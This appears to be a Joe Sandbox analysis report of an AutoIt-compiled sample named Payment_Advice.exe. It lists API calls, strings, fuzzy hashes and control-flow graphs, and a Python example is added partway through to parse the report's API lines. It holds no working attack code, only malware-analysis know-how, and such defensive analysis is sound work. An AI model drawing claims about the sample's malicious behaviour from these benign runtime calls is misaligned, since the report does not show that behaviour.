                                                                                                      • Part of subcall function 001735AB: RegisterClassExW.USER32(00000030), ref: 00173608
                                                                                                      • Part of subcall function 001735AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00173619
                                                                                                      • Part of subcall function 001735AB: InitCommonControlsEx.COMCTL32(?), ref: 00173636
                                                                                                      • Part of subcall function 001735AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00173646
                                                                                                      • Part of subcall function 001735AB: LoadIconW.USER32(000000A9), ref: 0017365C
                                                                                                      • Part of subcall function 001735AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0017366B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                    • API String ID: 423443420-4155596026
                                                                                                    • Opcode ID: 16de36782d0e59904e4753d09fdcb2a549f0f07d451ad1f1bd1708f3c3d2ffd7
                                                                                                    • Instruction ID: 7a56b911b2e7235871607a691861258c65ff9b11eda235cf5bbcd041ffa57066
                                                                                                    • Opcode Fuzzy Hash: 16de36782d0e59904e4753d09fdcb2a549f0f07d451ad1f1bd1708f3c3d2ffd7
                                                                                                    • Instruction Fuzzy Hash: 43215078D01314EBDB109FA6FC4DBA9BFB8FB09B50F40405AF504A62A1D3B94589CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 0017CE8E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID: p3$$p3$$p3$$p3$$p5$$p5$$x3$$x3$
                                                                                                    • API String ID: 1385522511-1470810328
                                                                                                    • Opcode ID: 7a9a4ce36e3248d78d938b3f062e807592959fd9a36ea83b7892c8993e11de44
                                                                                                    • Instruction ID: fad5bfd8462335854e2be89ea95d86992d897e982f3a565c888f83180ed47b32
                                                                                                    • Opcode Fuzzy Hash: 7a9a4ce36e3248d78d938b3f062e807592959fd9a36ea83b7892c8993e11de44
                                                                                                    • Instruction Fuzzy Hash: EE328D75A00205AFDB28CF58C885FBABBB5EF56354F25805DE809AB252C774EE41CBD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph (rendered basic-block graph with executed / not-executed colouring; the raw edge listing of the interactive widget is omitted here)
                                                                                                    APIs
                                                                                                      • Part of subcall function 00177953: FindCloseChangeNotification.KERNELBASE(?,?,00000000,001B3A1C), ref: 00177973
                                                                                                      • Part of subcall function 00176E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00173B33,?,00008000), ref: 00176E80
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00173C17
                                                                                                    • _wcslen.LIBCMT ref: 00173C96
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00173D81
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                    • API String ID: 2701412040-3738523708
                                                                                                    • Opcode ID: 66ea8c92fa53fbc390cdbdb9d8b9e57b186c76e64486fbe1c5d3f3536243fafc
                                                                                                    • Instruction ID: ede193de2bf07a27c076159a4b3fdf223442149fcb71cc83abaf79a449e82a81
                                                                                                    • Opcode Fuzzy Hash: 66ea8c92fa53fbc390cdbdb9d8b9e57b186c76e64486fbe1c5d3f3536243fafc
                                                                                                    • Instruction Fuzzy Hash: A022B1705083409FC725EF64C881AAFBBF5BFA9314F14891DF499932A2DB70DA48DB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: D5$$D5$$D5$$D5$$D5$D5$$Variable must be of type 'Object'.
                                                                                                    • API String ID: 0-3565641341
                                                                                                    • Opcode ID: 9206ac18e26757af5d808a64ab4bda9d9fc48430c428f74abbd09569fec70023
                                                                                                    • Instruction ID: 0aefba1ed7a983f28d77d18fe56ad5a6c3fdde1220b683af50d3e6bea4f38c54
                                                                                                    • Opcode Fuzzy Hash: 9206ac18e26757af5d808a64ab4bda9d9fc48430c428f74abbd09569fec70023
                                                                                                    • Instruction Fuzzy Hash: A8C28975A00205DFCB24CF98C884BAEB7B1BF19310F25816DE959AB361D771ED82CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 001815A2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID: D5$$D5$$D5$$D5$$D5$D5$
                                                                                                    • API String ID: 1385522511-2819346438
                                                                                                    • Opcode ID: d46ae72c85fa403912c87d52a5bb3949ab4ce935c933e03029aec2583f0ae973
                                                                                                    • Instruction ID: c56c999746acb3c8d5c0158ef10c2257b404eef64c8b7aa7010c62a9143c6e57
                                                                                                    • Opcode Fuzzy Hash: d46ae72c85fa403912c87d52a5bb3949ab4ce935c933e03029aec2583f0ae973
                                                                                                    • Instruction Fuzzy Hash: EFB2AB75A08300CFDB69EF18C480A2AB7E1BF99310F25895DE9858B351D771EE85CF92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph (rendered basic-block graph with executed / not-executed colouring; the raw edge listing of the interactive widget is omitted here)
                                                                                                    APIs
                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00172A9B
                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00172B3A
                                                                                                    • UnregisterHotKey.USER32(?), ref: 00172D1F
                                                                                                    • DestroyWindow.USER32(?), ref: 001B39F5
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 001B3A5A
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 001B3A87
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                    • String ID: close all
                                                                                                    • API String ID: 469580280-3243417748
                                                                                                    • Opcode ID: 645bc2705f911f438fd957e972b8c59215f840c8fa0daad2ba19541fc29c82fa
                                                                                                    • Instruction ID: fa8bf4482e234e1198acc69e9a1b3c6ac7d74f784e327c8abb92f3815a149d1a
                                                                                                    • Opcode Fuzzy Hash: 645bc2705f911f438fd957e972b8c59215f840c8fa0daad2ba19541fc29c82fa
                                                                                                    • Instruction Fuzzy Hash: FFD13C317012128FCB29EF65C599B69F7B4BF15710F2581ADE85AAB252CB31ED22CF40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph (rendered basic-block graph with executed / not-executed colouring; the raw edge listing of the interactive widget is omitted here)
                                                                                                    APIs
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001E8907
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?), ref: 001E891B
                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 001E8945
                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000), ref: 001E895F
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001E8971
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001E89BA
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 001E8A0A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 769691225-438819550
                                                                                                    • Opcode ID: d37636dc8fe087a5dec67326a73fec1f019ccc73d9d10a2f3ebdedbc2b431476
                                                                                                    • Instruction ID: 01a87b0c62889b8330254502bc7ca3712a46db4674691341adbe7cd6971d1de0
                                                                                                    • Opcode Fuzzy Hash: d37636dc8fe087a5dec67326a73fec1f019ccc73d9d10a2f3ebdedbc2b431476
                                                                                                    • Instruction Fuzzy Hash: A281D2729047809FCB24EF66C484AAEB3E9BF94310F54881EF88DD7251EB34D945CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%
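The API reference lines in these entries (for example "GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001E8907") print the call site as a virtual address inside the dumped image, and each entry's "Memory Dump Source" line states the base of that image ("Offset: 00170000, based on PE: true"). The parser below is an added example, not code from the Joe Sandbox report or its IDA plugin: it turns such lines into structured records, classifies each argument the way the report prints them (an 8-digit hex constant, "?" for a value the sandbox could not resolve, or a literal string it saw at the call), and converts each ref to an RVA for cross-referencing in a disassembler. The sample lines are copied from this page; the ApiRef, parse_api_refs, literal_args and by_module names are the example's own, and the RVA conversion assumes the dump sits at the image base the report gives (no relocation delta).

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Union

# Module base as printed in this report's "Memory Dump Source" lines
# ("Offset: 00170000, based on PE: true").
MODULE_BASE = 0x170000

# Constructed input: API reference lines copied verbatim from the entries on this page.
SAMPLE_LINES = """\
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001E8907
• SetFileAttributesW.KERNELBASE(?,00000000), ref: 001E895F
  • Part of subcall function 0017557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00175558,?,?,001B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0017559E
• OleInitialize.OLE32 ref: 001729CA
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001755EB,SwapMouseButtons,00000004,?), ref: 0017561C
"""

Arg = Union[int, str, None]

# One reference line: optional "Part of subcall function XXXX:" prefix, API.MODULE,
# optional "(args)", then "ref: ADDRESS". The bullet is the report's own.
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z0-9_@]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def classify_arg(token: str) -> Arg:
    """The report prints each argument as an 8-digit hex constant, '?' for a value
    it could not resolve, or a literal string it observed at the call (e.g. CMDLINE)."""
    if token == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", token):
        return int(token, 16)
    return token


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[Arg]
    va: int                            # call-site address as printed (a VA in the dump)
    base: int                          # image base the report states for the dump
    subcall_of: Optional[int] = None   # enclosing function when marked "Part of subcall"

    @property
    def rva(self) -> int:
        """RVA for use in IDA/Ghidra on the original file. Assumption: the dump is
        loaded at the base the report states, so no relocation delta applies."""
        return self.va - self.base


def parse_api_refs(text: str, base: int = MODULE_BASE) -> List[ApiRef]:
    """Parse every API reference line in text; lines that do not match are skipped."""
    refs: List[ApiRef] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [classify_arg(t) for t in raw_args.split(",")] if raw_args else []
        sub = m.group("sub")
        refs.append(ApiRef(
            api=m.group("api"),
            module=m.group("module"),
            args=args,
            va=int(m.group("ref"), 16),
            base=base,
            subcall_of=int(sub, 16) if sub else None,
        ))
    return refs


def literal_args(refs: List[ApiRef]) -> List[str]:
    """Resolved string arguments across all calls, in order: the quickest triage
    view (registry paths, window names, command-line markers)."""
    return [a for r in refs for a in r.args if isinstance(a, str)]


def by_module(refs: List[ApiRef]) -> Dict[str, List[str]]:
    """Module name -> API names called from it, in the order they appear."""
    out: Dict[str, List[str]] = {}
    for r in refs:
        out.setdefault(r.module, []).append(r.api)
    return out


if __name__ == "__main__":
    parsed = parse_api_refs(SAMPLE_LINES)
    for r in parsed:
        print(f"{r.api:22} {r.module:11} va={r.va:#x} rva={r.rva:#x} args={r.args}")
    print("literal strings:", literal_args(parsed))
    print("by module:", by_module(parsed))
```

The RVA is what you feed to a disassembler opened on the original Payment_Advice.exe; the "Part of subcall function" prefix is preserved as subcall_of so that a hit can be attributed to the helper routine the report credits rather than to the function whose entry lists it.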

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2316 1a90d5-1a90e5 2317 1a90ff-1a9101 2316->2317 2318 1a90e7-1a90fa call 19f656 call 19f669 2316->2318 2319 1a9469-1a9476 call 19f656 call 19f669 2317->2319 2320 1a9107-1a910d 2317->2320 2336 1a9481 2318->2336 2337 1a947c call 1a2b7c 2319->2337 2320->2319 2322 1a9113-1a913e 2320->2322 2322->2319 2325 1a9144-1a914d 2322->2325 2328 1a914f-1a9162 call 19f656 call 19f669 2325->2328 2329 1a9167-1a9169 2325->2329 2328->2337 2334 1a916f-1a9173 2329->2334 2335 1a9465-1a9467 2329->2335 2334->2335 2340 1a9179-1a917d 2334->2340 2338 1a9484-1a9489 2335->2338 2336->2338 2337->2336 2340->2328 2343 1a917f-1a9196 2340->2343 2345 1a9198-1a919b 2343->2345 2346 1a91b3-1a91bc 2343->2346 2349 1a919d-1a91a3 2345->2349 2350 1a91a5-1a91ae 2345->2350 2347 1a91da-1a91e4 2346->2347 2348 1a91be-1a91d5 call 19f656 call 19f669 call 1a2b7c 2346->2348 2352 1a91eb-1a9209 call 1a3bb0 call 1a2d58 * 2 2347->2352 2353 1a91e6-1a91e8 2347->2353 2379 1a939c 2348->2379 2349->2348 2349->2350 2354 1a924f-1a9269 2350->2354 2383 1a920b-1a9221 call 19f669 call 19f656 2352->2383 2384 1a9226-1a924c call 1a97b4 2352->2384 2353->2352 2356 1a926f-1a927f 2354->2356 2357 1a933d-1a9346 call 1afc3b 2354->2357 2356->2357 2361 1a9285-1a9287 2356->2361 2368 1a9348-1a935a 2357->2368 2369 1a93b9 2357->2369 2361->2357 2365 1a928d-1a92b3 2361->2365 2365->2357 2370 1a92b9-1a92cc 2365->2370 2368->2369 2374 1a935c-1a936b GetConsoleMode 2368->2374 2372 1a93bd-1a93d5 ReadFile 2369->2372 2370->2357 2375 1a92ce-1a92d0 2370->2375 2377 1a9431-1a943c GetLastError 2372->2377 2378 1a93d7-1a93dd 2372->2378 2374->2369 2380 1a936d-1a9371 2374->2380 2385 1a943e-1a9450 call 19f669 call 19f656 2377->2385 2386 1a9455-1a9458 2377->2386 2378->2377 2387 1a93df 2378->2387 2389 1a939f-1a93a9 call 1a2d58 2379->2389 2380->2372 2388 1a9373-1a938d ReadConsoleW 2380->2388 2381->2357 2390 1a92ff-1a9312 2381->2390 2383->2379 2384->2354 2385->2379 2398 1a945e-1a9460 2386->2398 2399 1a9395-1a939b call 19f633 2386->2399 2395 1a93e2-1a93f4 2387->2395 2396 1a93ae-1a93b7 2388->2396 2397 1a938f GetLastError 2388->2397 2389->2338 2390->2357 2391 1a9314-1a9316 2390->2391 2391->2357 2402 1a9318-1a9338 2391->2402 2395->2389 2406 1a93f6-1a93fa 2395->2406 2396->2395 2397->2399 2398->2389 2399->2379 2402->2357 2410 1a93fc-1a940c call 1a8df1 2406->2410 2411 1a9413-1a941e 2406->2411 2422 1a940f-1a9411 2410->2422 2416 1a942a-1a942f call 1a8c31 2411->2416 2417 1a9420 call 1a8f41 2411->2417 2423 1a9425-1a9428 2416->2423 2417->2423 2422->2389 2423->2422
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6e615818a0636188e8ed546e7e3d589af50c2ea4ffa42a7e9a511d270722e107
                                                                                                    • Instruction ID: 01338de98bd5159cb2cdd6c36b39f6bf857e8b0ba8481396e629df005e1e53ff
                                                                                                    • Opcode Fuzzy Hash: 6e615818a0636188e8ed546e7e3d589af50c2ea4ffa42a7e9a511d270722e107
                                                                                                    • Instruction Fuzzy Hash: C8C1D2B8E04349AFDF11DFA8D845BADBBB4BF1B310F144199E914A7392C7349982CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00173205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00173236
                                                                                                      • Part of subcall function 00173205: MapVirtualKeyW.USER32(00000010,00000000), ref: 0017323E
                                                                                                      • Part of subcall function 00173205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00173249
                                                                                                      • Part of subcall function 00173205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00173254
                                                                                                      • Part of subcall function 00173205: MapVirtualKeyW.USER32(00000011,00000000), ref: 0017325C
                                                                                                      • Part of subcall function 00173205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00173264
                                                                                                      • Part of subcall function 0017318C: RegisterWindowMessageW.USER32(00000004,?,00172906), ref: 001731E4
                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001729AC
                                                                                                    • OleInitialize.OLE32 ref: 001729CA
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 001B39E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                    • String ID: (&$$0$$$@($$$$
                                                                                                    • API String ID: 1986988660-1124607636
                                                                                                    • Opcode ID: e696c5015be30c1614cd73be0c6fdc81f425128af92853c6c1f112f61d6b2c85
                                                                                                    • Instruction ID: 42f84d808c21775b98b632eb2e953b999bea91aa645731cbd743a5dfb672f825
                                                                                                    • Opcode Fuzzy Hash: e696c5015be30c1614cd73be0c6fdc81f425128af92853c6c1f112f61d6b2c85
                                                                                                    • Instruction Fuzzy Hash: 5E7169B8921244CEC388EF6BBD6D6193AF5FB5A3047D0812AF519C72A2EB70445DCF64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2467 17353a-1735aa CreateWindowExW * 2 ShowWindow * 2
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00173568
                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00173589
                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,001732EF,?), ref: 0017359D
                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,001732EF,?), ref: 001735A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CreateShow
                                                                                                    • String ID: AutoIt v3$edit
                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                    • Opcode ID: e1f0d94bf3e55f10cf5a8e8541f61fc55e3c4100c366ee8599de2c34aa28b7c1
                                                                                                    • Instruction ID: da0d61bf95f35b76be75021da520beaf99b052c533f0920c920197af56395d67
                                                                                                    • Opcode Fuzzy Hash: e1f0d94bf3e55f10cf5a8e8541f61fc55e3c4100c366ee8599de2c34aa28b7c1
                                                                                                    • Instruction Fuzzy Hash: 65F03A78600394BAE7310B537C0CF372EBDDBC7F50B40005EB904A71A0C2691899DAB0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001755EB,SwapMouseButtons,00000004,?), ref: 0017561C
                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001755EB,SwapMouseButtons,00000004,?), ref: 0017563D
                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,001755EB,SwapMouseButtons,00000004,?), ref: 0017565F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: Control Panel\Mouse
                                                                                                    • API String ID: 3677997916-824357125
                                                                                                    • Opcode ID: 874911dec09df82e581f0019f0f253af2803cb218453ab0d66f3a57f1039db15
